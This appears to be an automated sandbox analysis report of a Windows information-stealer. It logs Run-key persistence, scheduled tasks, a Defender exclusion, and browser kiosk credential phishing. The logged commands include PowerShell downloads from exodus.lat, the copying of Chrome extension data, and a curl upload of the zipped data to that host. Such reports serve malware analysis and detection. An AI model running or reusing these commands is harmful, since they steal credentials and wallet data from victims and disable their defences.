| Set value (str) | \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\06d41594d9.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1012580001\\06d41594d9.exe" | C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\38f25d7919.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1012581001\\38f25d7919.exe" | C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\f672d1755a.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1012582001\\f672d1755a.exe" | C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\08bf4e72b2.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1012583001\\08bf4e72b2.exe" | C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SmartScreen = "C:\\Users\\Admin\\AppData\\Local\\Temp\\smartscreen.exe" | C:\Users\Admin\AppData\Local\Temp\smartscreen.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\COM Surrogate = "C:\\Users\\Admin\\AppData\\Local\\asm\\COMSurrogate.exe" | C:\Users\Admin\AppData\Local\asm\COMSurrogate.exe | N/A |
Checks installed software on the system
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | api.ipify.org | N/A | N/A |
| N/A | api.ipify.org | N/A | N/A |
AutoIT Executable
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Enumerates processes with tasklist
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\tasklist.exe | N/A |
Suspicious use of NtSetInformationThreadHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\3d7006312157afde3e4e4393d7a6d116cb7b2b8c0d29f8c22565c6a367c2919e.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1012579001\ca0fc6777c.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1012580001\06d41594d9.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1012581001\38f25d7919.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1012583001\08bf4e72b2.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\Tasks\skotes.job | C:\Users\Admin\AppData\Local\Temp\3d7006312157afde3e4e4393d7a6d116cb7b2b8c0d29f8c22565c6a367c2919e.exe | N/A |
| File opened for modification | C:\Windows\MovieArchives | C:\Users\Admin\AppData\Local\Temp\1012475001\wL3EGdM.exe | N/A |
| File opened for modification | C:\Windows\PackageExpression | C:\Users\Admin\AppData\Local\Temp\1012475001\wL3EGdM.exe | N/A |
Enumerates physical storage devices
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\1012580001\06d41594d9.exe |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\1012580001\06d41594d9.exe |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\tasklist.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\curl.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\net1.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\choice.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\findstr.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\findstr.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\schtasks.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\1012581001\38f25d7919.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\3d7006312157afde3e4e4393d7a6d116cb7b2b8c0d29f8c22565c6a367c2919e.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\1012579001\ca0fc6777c.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\1012582001\f672d1755a.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\net.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language | C:\Users\Admin\AppData\Local\Temp\1012582001\f672d1755a.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\net1.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\491505\RegAsm.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\1012382001\i1A5m12.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language\InstallLanguage | C:\Users\Admin\AppData\Local\Temp\1012582001\f672d1755a.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\is-ODVJL.tmp\i1A5m12.tmp | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\1012475001\wL3EGdM.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\net.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\curl.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\RAF Encoder 1.0.1.55\rafencoder.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\net1.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\1012580001\06d41594d9.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\xcopy.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\tasklist.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\schtasks.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\491505\Dr.com | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\1012583001\08bf4e72b2.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\net.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier | C:\Windows\SysWOW64\xcopy.exe | N/A |
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000_Classes\Local Settings | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
Runs net.exe
Scheduled Task/Job: Scheduled Task
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Processes
C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
C:\Users\Admin\AppData\Local\Temp\3d7006312157afde3e4e4393d7a6d116cb7b2b8c0d29f8c22565c6a367c2919e.exe
"C:\Users\Admin\AppData\Local\Temp\3d7006312157afde3e4e4393d7a6d116cb7b2b8c0d29f8c22565c6a367c2919e.exe"
C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
"C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe"
C:\Users\Admin\AppData\Local\Temp\1012382001\i1A5m12.exe
"C:\Users\Admin\AppData\Local\Temp\1012382001\i1A5m12.exe"
C:\Users\Admin\AppData\Local\Temp\is-ODVJL.tmp\i1A5m12.tmp
"C:\Users\Admin\AppData\Local\Temp\is-ODVJL.tmp\i1A5m12.tmp" /SL5="$70230,3291517,54272,C:\Users\Admin\AppData\Local\Temp\1012382001\i1A5m12.exe"
C:\Windows\SysWOW64\net.exe
"C:\Windows\system32\net.exe" pause raf_encoder_1252
C:\Users\Admin\AppData\Local\RAF Encoder 1.0.1.55\rafencoder.exe
"C:\Users\Admin\AppData\Local\RAF Encoder 1.0.1.55\rafencoder.exe" -i
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 pause raf_encoder_1252
C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
C:\Users\Admin\AppData\Local\Temp\1012475001\wL3EGdM.exe
"C:\Users\Admin\AppData\Local\Temp\1012475001\wL3EGdM.exe"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c copy Audit Audit.cmd && Audit.cmd
C:\Windows\SysWOW64\tasklist.exe
tasklist
C:\Windows\SysWOW64\findstr.exe
findstr /I "wrsa opssvc"
C:\Windows\SysWOW64\tasklist.exe
tasklist
C:\Windows\SysWOW64\findstr.exe
findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"
C:\Windows\SysWOW64\cmd.exe
cmd /c md 491505
C:\Windows\SysWOW64\cmd.exe
cmd /c copy /b ..\Dentists + ..\Flavor + ..\Disturbed + ..\Artistic + ..\Justice + ..\Proceeds + ..\Zip + ..\Soundtrack + ..\Revenue B
C:\Users\Admin\AppData\Local\Temp\491505\Dr.com
Dr.com B
C:\Windows\SysWOW64\choice.exe
choice /d y /t 15
C:\Windows\SysWOW64\cmd.exe
cmd /c schtasks.exe /create /tn "West" /tr "wscript //B 'C:\Users\Admin\AppData\Local\CreativePixel Tech\ApolloPro.js'" /sc daily /mo 1 /ri 3 /du 23:57 /F /RL HIGHEST
C:\Windows\SysWOW64\schtasks.exe
schtasks.exe /create /tn "ApolloPro" /tr "wscript //B 'C:\Users\Admin\AppData\Local\CreativePixel Tech\ApolloPro.js'" /sc onlogon /F /RL HIGHEST
C:\Windows\SysWOW64\schtasks.exe
schtasks.exe /create /tn "West" /tr "wscript //B 'C:\Users\Admin\AppData\Local\CreativePixel Tech\ApolloPro.js'" /sc daily /mo 1 /ri 3 /du 23:57 /F /RL HIGHEST
C:\Users\Admin\AppData\Local\Temp\1012579001\ca0fc6777c.exe
"C:\Users\Admin\AppData\Local\Temp\1012579001\ca0fc6777c.exe"
C:\Users\Admin\AppData\Local\Temp\1012580001\06d41594d9.exe
"C:\Users\Admin\AppData\Local\Temp\1012580001\06d41594d9.exe"
C:\Users\Admin\AppData\Local\Temp\1012581001\38f25d7919.exe
"C:\Users\Admin\AppData\Local\Temp\1012581001\38f25d7919.exe"
C:\Users\Admin\AppData\Local\Temp\1012582001\f672d1755a.exe
"C:\Users\Admin\AppData\Local\Temp\1012582001\f672d1755a.exe"
C:\Windows\SysWOW64\taskkill.exe
taskkill /F /IM firefox.exe /T
C:\Windows\SysWOW64\taskkill.exe
taskkill /F /IM chrome.exe /T
C:\Windows\SysWOW64\taskkill.exe
taskkill /F /IM msedge.exe /T
C:\Windows\SysWOW64\taskkill.exe
taskkill /F /IM opera.exe /T
C:\Windows\SysWOW64\taskkill.exe
taskkill /F /IM brave.exe /T
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2032 -parentBuildID 20240401114208 -prefsHandle 1960 -prefMapHandle 1952 -prefsLen 23680 -prefMapSize 244658 -appDir "C:\Program Files\Mozilla Firefox\browser" - {23b2cb8f-1c6d-4381-8cd3-7daa2f8a90f0} 3408 "\\.\pipe\gecko-crash-server-pipe.3408" gpu
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2472 -parentBuildID 20240401114208 -prefsHandle 2448 -prefMapHandle 2444 -prefsLen 24600 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {96fe4772-3a9a-49d3-a60c-1cec54ab547d} 3408 "\\.\pipe\gecko-crash-server-pipe.3408" socket
C:\Users\Admin\AppData\Local\Temp\1012583001\08bf4e72b2.exe
"C:\Users\Admin\AppData\Local\Temp\1012583001\08bf4e72b2.exe"
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2852 -childID 1 -isForBrowser -prefsHandle 3052 -prefMapHandle 3188 -prefsLen 22652 -prefMapSize 244658 -jsInitHandle 1268 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {f40f1f6e-7072-41de-9b00-8caca0f945ae} 3408 "\\.\pipe\gecko-crash-server-pipe.3408" tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3720 -childID 2 -isForBrowser -prefsHandle 3712 -prefMapHandle 3248 -prefsLen 29090 -prefMapSize 244658 -jsInitHandle 1268 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {cd67499b-90d6-4efd-8c64-33c660d2a25b} 3408 "\\.\pipe\gecko-crash-server-pipe.3408" tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4588 -parentBuildID 20240401114208 -sandboxingKind 0 -prefsHandle 4656 -prefMapHandle 4652 -prefsLen 29090 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {9dec769c-010a-47e0-afbd-06effc39b0b2} 3408 "\\.\pipe\gecko-crash-server-pipe.3408" utility
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5396 -childID 3 -isForBrowser -prefsHandle 5356 -prefMapHandle 5360 -prefsLen 27051 -prefMapSize 244658 -jsInitHandle 1268 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {0326ba0f-dc49-45ac-847b-faa81ed8b460} 3408 "\\.\pipe\gecko-crash-server-pipe.3408" tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5468 -childID 4 -isForBrowser -prefsHandle 5480 -prefMapHandle 5484 -prefsLen 27051 -prefMapSize 244658 -jsInitHandle 1268 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {7eba1c74-f3c9-4423-b2d2-303e843cd14c} 3408 "\\.\pipe\gecko-crash-server-pipe.3408" tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5768 -childID 5 -isForBrowser -prefsHandle 5676 -prefMapHandle 5680 -prefsLen 27051 -prefMapSize 244658 -jsInitHandle 1268 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {b708980d-98a0-4520-80b9-3c1841b4a63f} 3408 "\\.\pipe\gecko-crash-server-pipe.3408" tab
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 452 -p 2388 -ip 2388
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 188 -p 2388 -ip 2388
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2388 -s 1556
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2388 -s 1540
C:\Users\Admin\AppData\Local\Temp\491505\RegAsm.exe
C:\Users\Admin\AppData\Local\Temp\491505\RegAsm.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\download.bat" "
C:\Windows\SysWOW64\net.exe
net session
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 session
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\asm'"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\runsteal.bat" "
C:\Users\Admin\AppData\Local\Temp\smartscreen.exe
"C:\Users\Admin\AppData\Local\Temp\smartscreen.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Invoke-WebRequest -Uri 'https://exodus.lat/ss.bat' -OutFile 'C:\Users\Admin\AppData\Local\Temp\downloaded_script.bat' -UseBasicParsing"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\checkmiexe.bat" "
C:\Windows\SysWOW64\net.exe
net session
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 session
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\asm'"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -WindowStyle Hidden -Command "& { (New-Object Net.WebClient).DownloadFile('https://exodus.lat/COMSurrogate.exe', 'C:\Users\Admin\AppData\Local\asm\COMSurrogate.exe') }"
C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\downloaded_script.bat"
C:\Windows\SysWOW64\xcopy.exe
xcopy /E /I "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\*" "C:\Users\Admin\AppData\Local\Temp\ArchiveContents\Chrome\"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -WindowStyle Hidden -Command "& { (New-Object Net.WebClient).DownloadFile('https://exodus.lat/COMSurrogate.exe', 'C:\Users\Admin\AppData\Local\asm\COMSurrogate.exe') }"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -WindowStyle Hidden -Command "Start-Process -FilePath 'C:\Users\Admin\AppData\Local\asm\COMSurrogate.exe' -WindowStyle Hidden"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c curl -s https://api.ipify.org
C:\Windows\SysWOW64\curl.exe
curl -s https://api.ipify.org
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -WindowStyle Hidden -Command "Start-Process -FilePath 'C:\Users\Admin\AppData\Local\asm\COMSurrogate.exe' -WindowStyle Hidden"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -command "Compress-Archive -Path 'C:\Users\Admin\AppData\Local\Temp\ArchiveContents\*' -DestinationPath 'C:\Users\Admin\AppData\Local\Temp\N_Admin_181.215.176.83.zip'"
C:\Users\Admin\AppData\Local\asm\COMSurrogate.exe
"C:\Users\Admin\AppData\Local\asm\COMSurrogate.exe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c curl -F "file=@C:\Users\Admin\AppData\Local\Temp\N_Admin_181.215.176.83.zip" "https://exodus.lat/files/upload.php"
C:\Windows\SysWOW64\curl.exe
curl -F "file=@C:\Users\Admin\AppData\Local\Temp\N_Admin_181.215.176.83.zip" "https://exodus.lat/files/upload.php"
C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 28.118.140.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 71.159.190.20.in-addr.arpa | udp |
| RU | 185.215.113.43:80 | 185.215.113.43 | tcp |
| RU | 31.41.244.11:80 | 31.41.244.11 | tcp |
| US | 8.8.8.8:53 | 43.113.215.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 11.244.41.31.in-addr.arpa | udp |
| US | 8.8.8.8:53 | UWPunrsopYzTstryocRtyY.UWPunrsopYzTstryocRtyY | udp |
| RU | 185.215.113.16:80 | 185.215.113.16 | tcp |
| NL | 92.63.197.221:80 | 92.63.197.221 | tcp |
| US | 8.8.8.8:53 | 16.113.215.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 149.220.183.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | atten-supporse.biz | udp |
| US | 104.21.16.9:443 | atten-supporse.biz | tcp |
| US | 8.8.8.8:53 | se-blurry.biz | udp |
| US | 172.67.162.65:443 | se-blurry.biz | tcp |
| US | 8.8.8.8:53 | 221.197.63.92.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 9.16.21.104.in-addr.arpa | udp |
